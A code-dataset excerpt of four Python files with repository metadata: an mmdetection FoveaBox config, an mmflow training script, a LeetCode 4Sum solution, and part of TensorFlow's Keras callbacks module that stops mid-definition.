bcfaee049701f0696da3a47ef641b699bbe4b7cd | c5f58af61e3577ded52acda210f4f664651b598c | /template/mmdetection/configs/foveabox/fovea_r50_fpn_4x4_1x_coco.py | 2b00ad2faf61e2c437b5237d9de02049a81edf57 | [
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | hojihun5516/object-detection-level2-cv-02 | 0a4ee5cea9a77ef5d43fb61a4b37fe3a87cb0eac | bc8a08286935b31b8e7e597c4b1ca2cbbaeb9109 | refs/heads/master | 2023-08-31T09:50:59.150971 | 2021-10-16T15:00:19 | 2021-10-16T15:00:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,528 | py | _base_ = ["../_base_/datasets/coco_detection.py", "../_base_/schedules/schedule_1x.py", "../_base_/default_runtime.py"]
# model settings
model = dict(
type="FOVEA",
backbone=dict(
type="ResNet",
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type="BN", requires_grad=True),
norm_eval=True,
style="pytorch",
init_cfg=dict(type="Pretrained", checkpoint="torchvision://resnet50"),
),
neck=dict(
type="FPN",
in_channels=[256, 512, 1024, 2048],
out_channels=256,
start_level=1,
num_outs=5,
add_extra_convs="on_input",
),
bbox_head=dict(
type="FoveaHead",
num_classes=80,
in_channels=256,
stacked_convs=4,
feat_channels=256,
strides=[8, 16, 32, 64, 128],
base_edge_list=[16, 32, 64, 128, 256],
scale_ranges=((1, 64), (32, 128), (64, 256), (128, 512), (256, 2048)),
sigma=0.4,
with_deform=False,
loss_cls=dict(type="FocalLoss", use_sigmoid=True, gamma=1.50, alpha=0.4, loss_weight=1.0),
loss_bbox=dict(type="SmoothL1Loss", beta=0.11, loss_weight=1.0),
),
# training and testing settings
train_cfg=dict(),
test_cfg=dict(nms_pre=1000, score_thr=0.05, nms=dict(type="nms", iou_threshold=0.5), max_per_img=100),
)
data = dict(samples_per_gpu=4, workers_per_gpu=4)
# optimizer
optimizer = dict(type="SGD", lr=0.01, momentum=0.9, weight_decay=0.0001)
| [
"[email protected]"
] | |
6357de8a8bbeccf5484ff2c1b1e34b8452d63ff4 | 8a12d939f01a179c1fb8b7e72d8cb1c7d4970b6f | /tools/train.py | ebc65480c5fc9610caee60b39c0eafdd4661cecf | [
"Apache-2.0"
] | permissive | 459737087/mmflow | bebd2da1bd87e9b5b2a1a10ecdc61558978610d9 | a32f7af12f1a0d2ae3f962f4c94a4a1680c7a19e | refs/heads/master | 2023-09-03T03:04:40.010033 | 2021-11-18T04:35:06 | 2021-11-18T04:35:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,433 | py | # Copyright (c) OpenMMLab. All rights reserved.
import argparse
import copy
import os
import os.path as osp
import time
import mmcv
import torch
from mmcv import Config, DictAction
from mmcv.runner import init_dist
from mmcv.utils import get_git_hash
from mmflow import __version__
from mmflow.apis import set_random_seed, train_model
from mmflow.datasets import build_dataset
from mmflow.models import build_flow_estimator
from mmflow.utils import collect_env, get_root_logger
def parse_args():
parser = argparse.ArgumentParser(description='Train a flow estimator')
parser.add_argument('config', help='train config file path')
parser.add_argument('--work-dir', help='the dir to save logs and models')
parser.add_argument(
'--load-from', help='the checkpoint file to load weights from')
parser.add_argument(
'--resume-from', help='the checkpoint file to resume from')
parser.add_argument(
'--no-validate',
action='store_true',
help='whether not to evaluate the checkpoint during training')
group_gpus = parser.add_mutually_exclusive_group()
group_gpus.add_argument(
'--gpus',
type=int,
help='number of gpus to use '
'(only applicable to non-distributed training)')
group_gpus.add_argument(
'--gpu-ids',
type=int,
nargs='+',
help='ids of gpus to use '
'(only applicable to non-distributed training)')
parser.add_argument('--seed', type=int, default=None, help='random seed')
parser.add_argument(
'--deterministic',
action='store_true',
help='whether to set deterministic options for CUDNN backend.')
parser.add_argument(
'--cfg-options',
nargs='+',
action=DictAction,
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file. If the value to '
'be overwritten is a list, it should be like key="[a,b]" or key=a,b '
'It also allows nested list/tuple values, e.g. key="[(a,b),(c,d)]" '
'Note that the quotation marks are necessary and that no white space '
'is allowed.')
parser.add_argument(
'--launcher',
choices=['none', 'pytorch', 'slurm', 'mpi'],
default='none',
help='job launcher')
parser.add_argument('--local_rank', type=int, default=0)
args = parser.parse_args()
if 'LOCAL_RANK' not in os.environ:
os.environ['LOCAL_RANK'] = str(args.local_rank)
return args
def main():
args = parse_args()
cfg = Config.fromfile(args.config)
if args.cfg_options is not None:
cfg.merge_from_dict(args.cfg_options)
# set cudnn_benchmark
if cfg.get('cudnn_benchmark', False):
torch.backends.cudnn.benchmark = True
# work_dir is determined in this priority: CLI > config > default filename
if args.work_dir is not None:
# update configs according to CLI args if args.work_dir is not None
cfg.work_dir = args.work_dir
elif cfg.get('work_dir', None) is None:
# use config filename as default work_dir if cfg.work_dir is None
cfg.work_dir = osp.join('./work_dirs',
osp.splitext(osp.basename(args.config))[0])
if args.load_from is not None:
cfg.load_from = args.load_from
if args.resume_from is not None:
cfg.resume_from = args.resume_from
if args.gpu_ids is not None:
cfg.gpu_ids = args.gpu_ids
else:
cfg.gpu_ids = range(1) if args.gpus is None else range(args.gpus)
# init distributed env first, since logger depends on the dist info.
if args.launcher == 'none':
distributed = False
else:
distributed = True
init_dist(args.launcher, **cfg.dist_params)
# create work_dir
mmcv.mkdir_or_exist(osp.abspath(cfg.work_dir))
# dump config
cfg.dump(osp.join(cfg.work_dir, osp.basename(args.config)))
# init the logger before other steps
timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())
log_file = osp.join(cfg.work_dir, f'{timestamp}.log')
logger = get_root_logger(log_file=log_file, log_level=cfg.log_level)
# init the meta dict to record some important information such as
# environment info and seed, which will be logged
meta = dict()
# log env info
env_info_dict = collect_env()
env_info = '\n'.join([f'{k}: {v}' for k, v in env_info_dict.items()])
dash_line = '-' * 60 + '\n'
logger.info('Environment info:\n' + dash_line + env_info + '\n' +
dash_line)
meta['env_info'] = env_info
# log some basic info
logger.info(f'Distributed training: {distributed}')
logger.info(f'Config:\n{cfg.pretty_text}')
# set random seeds
if args.seed is not None:
logger.info(f'Set random seed to {args.seed}, deterministic: '
f'{args.deterministic}')
set_random_seed(args.seed, deterministic=args.deterministic)
cfg.seed = args.seed
meta['seed'] = args.seed
meta['exp_name'] = osp.basename(args.config)
model = build_flow_estimator(cfg.model)
model.init_weights()
logger.info(model)
if cfg.data.train_dataloader.get('sample_ratio') is None:
# build_dataset will concat the list of dataset
# so there is one dataset in the list
datasets = [build_dataset(cfg.data.train)]
else:
# the list of datasets is for Mixbatch
datasets = [[build_dataset(c) for c in cfg.data.train]]
if len(cfg.workflow) == 2:
val_dataset = copy.deepcopy(cfg.data.val)
val_dataset.pipeline = cfg.data.train.pipeline
datasets.append(build_dataset(val_dataset))
if cfg.checkpoint_config is not None:
# save mmflow version, config file content and class names in
# checkpoints as meta data
cfg.checkpoint_config.meta = dict(
mmflow_version=f'{__version__}+{get_git_hash()[:7]}',
config=cfg.pretty_text)
# add an attribute for visualization convenience
datasets_size = 0
for ds in datasets:
datasets_size += len(ds)
logger.info(f'dataset size {datasets_size}')
train_model(
model,
datasets,
cfg,
distributed=distributed,
validate=(not args.no_validate),
timestamp=timestamp,
meta=meta)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
73575c45ed55b4146558350ddb50d28b66091187 | 8ef5a09d76a11c56963f18e6a08474a1a8bafe3c | /leet_code/18. 4Sum.py | 972245f09f2573fa6cc14283b372bbd0b6f022b4 | [] | no_license | roiei/algo | 32c4677649c7666db148f6183fbfbf66c8b1969f | ae8bb8bf4ae4026ccaf1dce323b4098547dd35ec | refs/heads/master | 2022-04-01T19:21:27.768675 | 2022-02-19T06:15:29 | 2022-02-19T06:15:29 | 169,021,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,124 | py |
import time
from util.util_list import *
from util.util_tree import *
import copy
import collections
import bisect
class Solution:
def fourSum(self, nums: [int], target: int) -> [[int]]:
n = len(nums)
res = set()
nums.sort()
for i in range(n - 2):
for j in range(i + 1, n - 2):
l = j + 1
r = n - 1
acc = nums[i] + nums[j]
diff = target - acc
while l < r:
sum = nums[l] + nums[r]
if sum == diff:
res.add((nums[i], nums[j], nums[l], nums[r],))
l += 1
r -= 1
continue
if sum > diff:
r -= 1
elif sum < diff:
l += 1
return res
stime = time.time()
print([
[-1, 0, 0, 1],
[-2, -1, 1, 2],
[-2, 0, 0, 2]
] == Solution().fourSum([1, 0, -1, 0, -2, 2], 0))
print('elapse time: {} sec'.format(time.time() - stime)) | [
"[email protected]"
] | |
d009fd95134a3669c4c74320b9db66ee498878d4 | 81e706b69c789aff05691c41fa79156942927f82 | /site-packages/tensorflow/python/keras/callbacks.py | 5d086dc28d5ff15b78374ab770676dcc6059d4b8 | [] | no_license | yoncho/OpenCV-code | f5a1091ef32f3c8c3254ab93e083950b84c4fabd | bda2f793b11462e67c7ab644b342beffb871e3de | refs/heads/master | 2023-03-30T12:01:23.521511 | 2021-04-01T13:45:44 | 2021-04-01T13:45:44 | 291,398,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 76,839 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-import-not-at-top
"""Callbacks: utilities called at certain points during model training.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import csv
import io
import json
import os
import re
import tempfile
import time
import numpy as np
import six
from tensorflow.python.data.ops import iterator_ops
from tensorflow.python.distribute import distribute_coordinator_context as dc_context
from tensorflow.python.eager import context
from tensorflow.python.framework import ops
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.utils.data_utils import Sequence
from tensorflow.python.keras.utils.generic_utils import Progbar
from tensorflow.python.keras.utils.mode_keys import ModeKeys
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import checkpoint_management
from tensorflow.python.util.tf_export import keras_export
try:
import requests
except ImportError:
requests = None
# Constant for `tf.keras.Model` to store the epoch at which the most recently
# saved checkpoint was saved. See `Model._get_updated_initial_epoch()`'s
# docstring for more information.
CKPT_SAVED_EPOCH = '_ckpt_saved_epoch'
def configure_callbacks(callbacks,
model,
do_validation=False,
batch_size=None,
epochs=None,
steps_per_epoch=None,
samples=None,
verbose=1,
count_mode='steps',
mode=ModeKeys.TRAIN):
"""Configures callbacks for use in various training loops.
Arguments:
callbacks: List of Callbacks.
model: Model being trained.
do_validation: Whether or not validation loop will be run.
batch_size: Number of samples per batch.
epochs: Number of epoch to train.
steps_per_epoch: Number of batches to run per training epoch.
samples: Number of training samples.
verbose: int, 0 or 1. Keras logging verbosity to pass to ProgbarLogger.
count_mode: One of 'steps' or 'samples'. Per-batch or per-sample count.
mode: String. One of ModeKeys.TRAIN, ModeKeys.TEST, or ModeKeys.PREDICT.
Which loop mode to configure callbacks for.
Returns:
Instance of CallbackList used to control all Callbacks.
"""
# Check if callbacks have already been configured.
if isinstance(callbacks, CallbackList):
return callbacks
if not callbacks:
callbacks = []
# Add additional callbacks during training.
if mode == ModeKeys.TRAIN:
model.history = History()
callbacks = [BaseLogger()] + (callbacks or []) + [model.history]
if verbose:
callbacks.append(ProgbarLogger(count_mode))
callback_list = CallbackList(callbacks)
# Set callback model
callback_model = model._get_callback_model() # pylint: disable=protected-access
callback_list.set_model(callback_model)
set_callback_parameters(
callback_list,
model,
do_validation=do_validation,
batch_size=batch_size,
epochs=epochs,
steps_per_epoch=steps_per_epoch,
samples=samples,
verbose=verbose,
mode=mode)
callback_list.model.stop_training = False
# pylint: disable=protected-access
if callback_list.model._ckpt_saved_epoch is not None:
# The attribute `_ckpt_saved_epoch` is supposed to be None at the start of
# training (it should be made None at the end of successful multi-worker
# training), unless the user's `fit()` does not end successfully before
# making another `fit()` call.
raise ValueError(
'`tf.Keras.Model._ckpt_saved_epoch` attr should be None at '
'callback setup time. Please ensure `fit()` in multi-worker '
'training finishes successfully before starting a new one. If the '
'issue persists, try using only one `model.fit()` in multi-worker '
'training.')
return callback_list
def set_callback_parameters(callback_list,
model,
do_validation=False,
batch_size=None,
epochs=None,
steps_per_epoch=None,
samples=None,
verbose=1,
mode=ModeKeys.TRAIN):
"""Sets callback parameters.
Arguments:
callback_list: CallbackList instance.
model: Model being trained.
do_validation: Whether or not validation loop will be run.
batch_size: Number of samples per batch.
epochs: Number of epoch to train.
steps_per_epoch: Number of batches to run per training epoch.
samples: Number of training samples.
verbose: int, 0 or 1. Keras logging verbosity to pass to ProgbarLogger.
mode: String. One of ModeKeys.TRAIN, ModeKeys.TEST, or ModeKeys.PREDICT.
Which loop mode to configure callbacks for.
"""
for cbk in callback_list:
if isinstance(cbk, (BaseLogger, ProgbarLogger)):
cbk.stateful_metrics = model.metrics_names[1:] # Exclude `loss`
# Set callback parameters
callback_metrics = []
# When we have deferred build scenario with iterator input, we will compile
# when we standardize first batch of data.
if mode != ModeKeys.PREDICT and hasattr(model, 'metrics_names'):
callback_metrics = copy.copy(model.metrics_names)
if do_validation:
callback_metrics += ['val_' + n for n in model.metrics_names]
callback_params = {
'batch_size': batch_size,
'epochs': epochs,
'steps': steps_per_epoch,
'samples': samples,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
}
callback_list.set_params(callback_params)
def _is_generator_like(data):
"""Checks if data is a generator, Sequence, or Iterator."""
return (hasattr(data, 'next') or hasattr(data, '__next__') or isinstance(
data, (Sequence, iterator_ops.Iterator, iterator_ops.IteratorV2)))
def make_logs(model, logs, outputs, mode, prefix=''):
"""Computes logs for sending to `on_batch_end` methods."""
if mode in {ModeKeys.TRAIN, ModeKeys.TEST}:
if hasattr(model, 'metrics_names'):
for label, output in zip(model.metrics_names, outputs):
logs[prefix + label] = output
else:
logs['outputs'] = outputs
return logs
class CallbackList(object):
"""Container abstracting a list of callbacks.
Arguments:
callbacks: List of `Callback` instances.
queue_length: Queue length for keeping
running statistics over callback execution time.
"""
def __init__(self, callbacks=None, queue_length=10):
callbacks = callbacks or []
self.callbacks = [c for c in callbacks]
self.queue_length = queue_length
self.params = {}
self.model = None
self._reset_batch_timing()
def _reset_batch_timing(self):
self._delta_t_batch = 0.
self._delta_ts = collections.defaultdict(
lambda: collections.deque([], maxlen=self.queue_length))
def append(self, callback):
self.callbacks.append(callback)
def set_params(self, params):
self.params = params
for callback in self.callbacks:
callback.set_params(params)
def set_model(self, model):
self.model = model
for callback in self.callbacks:
callback.set_model(model)
def _call_batch_hook(self, mode, hook, batch, logs=None):
"""Helper function for all batch_{begin | end} methods."""
if not self.callbacks:
return
hook_name = 'on_{mode}_batch_{hook}'.format(mode=mode, hook=hook)
if hook == 'begin':
self._t_enter_batch = time.time()
if hook == 'end':
# Batch is ending, calculate batch time.
self._delta_t_batch = time.time() - self._t_enter_batch
logs = logs or {}
t_before_callbacks = time.time()
for callback in self.callbacks:
batch_hook = getattr(callback, hook_name)
batch_hook(batch, logs)
self._delta_ts[hook_name].append(time.time() - t_before_callbacks)
delta_t_median = np.median(self._delta_ts[hook_name])
if (self._delta_t_batch > 0. and
delta_t_median > 0.95 * self._delta_t_batch and delta_t_median > 0.1):
logging.warning(
'Method (%s) is slow compared '
'to the batch update (%f). Check your callbacks.', hook_name,
delta_t_median)
def _call_begin_hook(self, mode):
"""Helper function for on_{train|test|predict}_begin methods."""
if mode == ModeKeys.TRAIN:
self.on_train_begin()
elif mode == ModeKeys.TEST:
self.on_test_begin()
else:
self.on_predict_begin()
def _call_end_hook(self, mode):
"""Helper function for on_{train|test|predict}_end methods."""
if mode == ModeKeys.TRAIN:
self.on_train_end()
elif mode == ModeKeys.TEST:
self.on_test_end()
else:
self.on_predict_end()
def on_batch_begin(self, batch, logs=None):
self._call_batch_hook(ModeKeys.TRAIN, 'begin', batch, logs=logs)
def on_batch_end(self, batch, logs=None):
self._call_batch_hook(ModeKeys.TRAIN, 'end', batch, logs=logs)
def on_epoch_begin(self, epoch, logs=None):
"""Calls the `on_epoch_begin` methods of its callbacks.
This function should only be called during TRAIN mode.
Arguments:
epoch: integer, index of epoch.
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
logs = logs or {}
for callback in self.callbacks:
callback.on_epoch_begin(epoch, logs)
self._reset_batch_timing()
def on_epoch_end(self, epoch, logs=None):
"""Calls the `on_epoch_end` methods of its callbacks.
This function should only be called during TRAIN mode.
Arguments:
epoch: integer, index of epoch.
logs: dict, metric results for this training epoch, and for the
validation epoch if validation is performed. Validation result keys
are prefixed with `val_`.
"""
logs = logs or {}
for callback in self.callbacks:
callback.on_epoch_end(epoch, logs)
def on_train_batch_begin(self, batch, logs=None):
"""Calls the `on_train_batch_begin` methods of its callbacks.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Has keys `batch` and `size` representing the current batch
number and the size of the batch.
"""
self._call_batch_hook(ModeKeys.TRAIN, 'begin', batch, logs=logs)
def on_train_batch_end(self, batch, logs=None):
"""Calls the `on_train_batch_end` methods of its callbacks.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Metric results for this batch.
"""
self._call_batch_hook(ModeKeys.TRAIN, 'end', batch, logs=logs)
def on_test_batch_begin(self, batch, logs=None):
"""Calls the `on_test_batch_begin` methods of its callbacks.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Has keys `batch` and `size` representing the current batch
number and the size of the batch.
"""
self._call_batch_hook(ModeKeys.TEST, 'begin', batch, logs=logs)
def on_test_batch_end(self, batch, logs=None):
"""Calls the `on_test_batch_end` methods of its callbacks.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Metric results for this batch.
"""
self._call_batch_hook(ModeKeys.TEST, 'end', batch, logs=logs)
def on_predict_batch_begin(self, batch, logs=None):
"""Calls the `on_predict_batch_begin` methods of its callbacks.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Has keys `batch` and `size` representing the current batch
number and the size of the batch.
"""
self._call_batch_hook(ModeKeys.PREDICT, 'begin', batch, logs=logs)
def on_predict_batch_end(self, batch, logs=None):
"""Calls the `on_predict_batch_end` methods of its callbacks.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Metric results for this batch.
"""
self._call_batch_hook(ModeKeys.PREDICT, 'end', batch, logs=logs)
def on_train_begin(self, logs=None):
"""Calls the `on_train_begin` methods of its callbacks.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
for callback in self.callbacks:
callback.on_train_begin(logs)
def on_train_end(self, logs=None):
"""Calls the `on_train_end` methods of its callbacks.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
for callback in self.callbacks:
callback.on_train_end(logs)
def on_test_begin(self, logs=None):
"""Calls the `on_test_begin` methods of its callbacks.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
for callback in self.callbacks:
callback.on_test_begin(logs)
def on_test_end(self, logs=None):
"""Calls the `on_test_end` methods of its callbacks.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
for callback in self.callbacks:
callback.on_test_end(logs)
def on_predict_begin(self, logs=None):
"""Calls the 'on_predict_begin` methods of its callbacks.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
for callback in self.callbacks:
callback.on_predict_begin(logs)
def on_predict_end(self, logs=None):
"""Calls the `on_predict_end` methods of its callbacks.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
for callback in self.callbacks:
callback.on_predict_end(logs)
def __iter__(self):
return iter(self.callbacks)
@keras_export('keras.callbacks.Callback')
class Callback(object):
"""Abstract base class used to build new callbacks.
Attributes:
params: dict. Training parameters
(eg. verbosity, batch size, number of epochs...).
model: instance of `keras.models.Model`.
Reference of the model being trained.
validation_data: Deprecated. Do not use.
The `logs` dictionary that callback methods
take as argument will contain keys for quantities relevant to
the current batch or epoch.
Currently, the `.fit()` method of the `Model` class
will include the following quantities in the `logs` that
it passes to its callbacks:
on_epoch_end: logs include `acc` and `loss`, and
optionally include `val_loss`
(if validation is enabled in `fit`), and `val_acc`
(if validation and accuracy monitoring are enabled).
on_batch_begin: logs include `size`,
the number of samples in the current batch.
on_batch_end: logs include `loss`, and optionally `acc`
(if accuracy monitoring is enabled).
"""
def __init__(self):
self.validation_data = None
self.model = None
# Whether this Callback should only run on the chief worker in a
# Multi-Worker setting.
# TODO(omalleyt): Make this attr public once solution is stable.
self._chief_worker_only = None
def set_params(self, params):
self.params = params
def set_model(self, model):
self.model = model
def on_batch_begin(self, batch, logs=None):
"""A backwards compatibility alias for `on_train_batch_begin`."""
def on_batch_end(self, batch, logs=None):
"""A backwards compatibility alias for `on_train_batch_end`."""
def on_epoch_begin(self, epoch, logs=None):
"""Called at the start of an epoch.
Subclasses should override for any actions to run. This function should only
be called during TRAIN mode.
Arguments:
epoch: integer, index of epoch.
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
def on_epoch_end(self, epoch, logs=None):
"""Called at the end of an epoch.
Subclasses should override for any actions to run. This function should only
be called during TRAIN mode.
Arguments:
epoch: integer, index of epoch.
logs: dict, metric results for this training epoch, and for the
validation epoch if validation is performed. Validation result keys
are prefixed with `val_`.
"""
def on_train_batch_begin(self, batch, logs=None):
"""Called at the beginning of a training batch in `fit` methods.
Subclasses should override for any actions to run.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Has keys `batch` and `size` representing the current batch
number and the size of the batch.
"""
# For backwards compatibility.
self.on_batch_begin(batch, logs=logs)
def on_train_batch_end(self, batch, logs=None):
"""Called at the end of a training batch in `fit` methods.
Subclasses should override for any actions to run.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Metric results for this batch.
"""
# For backwards compatibility.
self.on_batch_end(batch, logs=logs)
def on_test_batch_begin(self, batch, logs=None):
"""Called at the beginning of a batch in `evaluate` methods.
Also called at the beginning of a validation batch in the `fit`
methods, if validation data is provided.
Subclasses should override for any actions to run.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Has keys `batch` and `size` representing the current batch
number and the size of the batch.
"""
def on_test_batch_end(self, batch, logs=None):
"""Called at the end of a batch in `evaluate` methods.
Also called at the end of a validation batch in the `fit`
methods, if validation data is provided.
Subclasses should override for any actions to run.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Metric results for this batch.
"""
def on_predict_batch_begin(self, batch, logs=None):
"""Called at the beginning of a batch in `predict` methods.
Subclasses should override for any actions to run.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Has keys `batch` and `size` representing the current batch
number and the size of the batch.
"""
def on_predict_batch_end(self, batch, logs=None):
"""Called at the end of a batch in `predict` methods.
Subclasses should override for any actions to run.
Arguments:
batch: integer, index of batch within the current epoch.
logs: dict. Metric results for this batch.
"""
def on_train_begin(self, logs=None):
"""Called at the beginning of training.
Subclasses should override for any actions to run.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
def on_train_end(self, logs=None):
"""Called at the end of training.
Subclasses should override for any actions to run.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
def on_test_begin(self, logs=None):
"""Called at the beginning of evaluation or validation.
Subclasses should override for any actions to run.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
def on_test_end(self, logs=None):
"""Called at the end of evaluation or validation.
Subclasses should override for any actions to run.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
def on_predict_begin(self, logs=None):
"""Called at the beginning of prediction.
Subclasses should override for any actions to run.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
def on_predict_end(self, logs=None):
"""Called at the end of prediction.
Subclasses should override for any actions to run.
Arguments:
logs: dict. Currently no data is passed to this argument for this method
but that may change in the future.
"""
@keras_export('keras.callbacks.BaseLogger')
class BaseLogger(Callback):
"""Callback that accumulates epoch averages of metrics.
This callback is automatically applied to every Keras model.
Arguments:
stateful_metrics: Iterable of string names of metrics that
should *not* be averaged over an epoch.
Metrics in this list will be logged as-is in `on_epoch_end`.
All others will be averaged in `on_epoch_end`.
"""
def __init__(self, stateful_metrics=None):
super(BaseLogger, self).__init__()
self.stateful_metrics = set(stateful_metrics or [])
def on_epoch_begin(self, epoch, logs=None):
self.seen = 0
self.totals = {}
def on_batch_end(self, batch, logs=None):
logs = logs or {}
batch_size = logs.get('size', 0)
# In case of distribution strategy we can potentially run multiple steps
# at the same time, we should account for that in the `seen` calculation.
num_steps = logs.get('num_steps', 1)
self.seen += batch_size * num_steps
for k, v in logs.items():
if k in self.stateful_metrics:
self.totals[k] = v
else:
if k in self.totals:
self.totals[k] += v * batch_size
else:
self.totals[k] = v * batch_size
def on_epoch_end(self, epoch, logs=None):
if logs is not None:
for k in self.params['metrics']:
if k in self.totals:
# Make value available to next callbacks.
if k in self.stateful_metrics:
logs[k] = self.totals[k]
else:
logs[k] = self.totals[k] / self.seen
@keras_export('keras.callbacks.TerminateOnNaN')
class TerminateOnNaN(Callback):
"""Callback that terminates training when a NaN loss is encountered.
"""
def on_batch_end(self, batch, logs=None):
logs = logs or {}
loss = logs.get('loss')
if loss is not None:
if np.isnan(loss) or np.isinf(loss):
print('Batch %d: Invalid loss, terminating training' % (batch))
self.model.stop_training = True
@keras_export('keras.callbacks.ProgbarLogger')
class ProgbarLogger(Callback):
"""Callback that prints metrics to stdout.
Arguments:
count_mode: One of "steps" or "samples".
Whether the progress bar should
count samples seen or steps (batches) seen.
stateful_metrics: Iterable of string names of metrics that
should *not* be averaged over an epoch.
Metrics in this list will be logged as-is.
All others will be averaged over time (e.g. loss, etc).
Raises:
ValueError: In case of invalid `count_mode`.
"""
def __init__(self, count_mode='samples', stateful_metrics=None):
super(ProgbarLogger, self).__init__()
if count_mode == 'samples':
self.use_steps = False
elif count_mode == 'steps':
self.use_steps = True
else:
raise ValueError('Unknown `count_mode`: ' + str(count_mode))
self.stateful_metrics = set(stateful_metrics or [])
def on_train_begin(self, logs=None):
self.verbose = self.params['verbose']
self.epochs = self.params['epochs']
def on_epoch_begin(self, epoch, logs=None):
self.seen = 0
if self.use_steps:
self.target = self.params['steps']
else:
self.target = self.params['samples']
if self.verbose:
if self.epochs > 1:
print('Epoch %d/%d' % (epoch + 1, self.epochs))
self.progbar = Progbar(
target=self.target,
verbose=self.verbose,
stateful_metrics=self.stateful_metrics,
unit_name='step' if self.use_steps else 'sample')
def on_batch_begin(self, batch, logs=None):
self.log_values = []
def on_batch_end(self, batch, logs=None):
logs = logs or {}
batch_size = logs.get('size', 0)
# In case of distribution strategy we can potentially run multiple steps
# at the same time, we should account for that in the `seen` calculation.
num_steps = logs.get('num_steps', 1)
if self.use_steps:
self.seen += num_steps
else:
self.seen += batch_size * num_steps
for k in self.params['metrics']:
if k in logs:
self.log_values.append((k, logs[k]))
# Skip progbar update for the last batch;
# will be handled by on_epoch_end.
if self.verbose and (self.target is None or self.seen < self.target):
self.progbar.update(self.seen, self.log_values)
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
for k in self.params['metrics']:
if k in logs:
self.log_values.append((k, logs[k]))
if self.verbose:
self.progbar.update(self.seen, self.log_values)
@keras_export('keras.callbacks.History')
class History(Callback):
"""Callback that records events into a `History` object.
This callback is automatically applied to
every Keras model. The `History` object
gets returned by the `fit` method of models.
"""
def on_train_begin(self, logs=None):
self.epoch = []
self.history = {}
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
self.epoch.append(epoch)
for k, v in logs.items():
self.history.setdefault(k, []).append(v)
@keras_export('keras.callbacks.ModelCheckpoint')
class ModelCheckpoint(Callback):
"""Save the model after every epoch.
`filepath` can contain named formatting options,
which will be filled the value of `epoch` and
keys in `logs` (passed in `on_epoch_end`).
For example: if `filepath` is `weights.{epoch:02d}-{val_loss:.2f}.hdf5`,
then the model checkpoints will be saved with the epoch number and
the validation loss in the filename.
Arguments:
filepath: string, path to save the model file.
monitor: quantity to monitor.
verbose: verbosity mode, 0 or 1.
save_best_only: if `save_best_only=True`, the latest best model according
to the quantity monitored will not be overwritten.
mode: one of {auto, min, max}. If `save_best_only=True`, the decision to
overwrite the current save file is made based on either the maximization
or the minimization of the monitored quantity. For `val_acc`, this
should be `max`, for `val_loss` this should be `min`, etc. In `auto`
mode, the direction is automatically inferred from the name of the
monitored quantity.
save_weights_only: if True, then only the model's weights will be saved
(`model.save_weights(filepath)`), else the full model is saved
(`model.save(filepath)`).
save_freq: `'epoch'` or integer. When using `'epoch'`, the callback saves
the model after each epoch. When using integer, the callback saves the
model at end of a batch at which this many samples have been seen since
last saving. Note that if the saving isn't aligned to epochs, the
monitored metric may potentially be less reliable (it could reflect as
little as 1 batch, since the metrics get reset every epoch). Defaults to
`'epoch'`
load_weights_on_restart: Whether the training should restore the model. If
True, the model will attempt to load the checkpoint file from `filepath`
at the start of `model.fit()`. This saves the need of manually calling
`model.load_weights()` before `model.fit(). In multi-worker distributed
training, this provides fault-tolerance and loads the model
automatically upon recovery of workers. The callback gives up loading if
the filepath does not exist, and raises ValueError if format does not
match. Defaults to False.
**kwargs: Additional arguments for backwards compatibility. Possible key
is `period`.
"""
def __init__(self,
filepath,
monitor='val_loss',
verbose=0,
save_best_only=False,
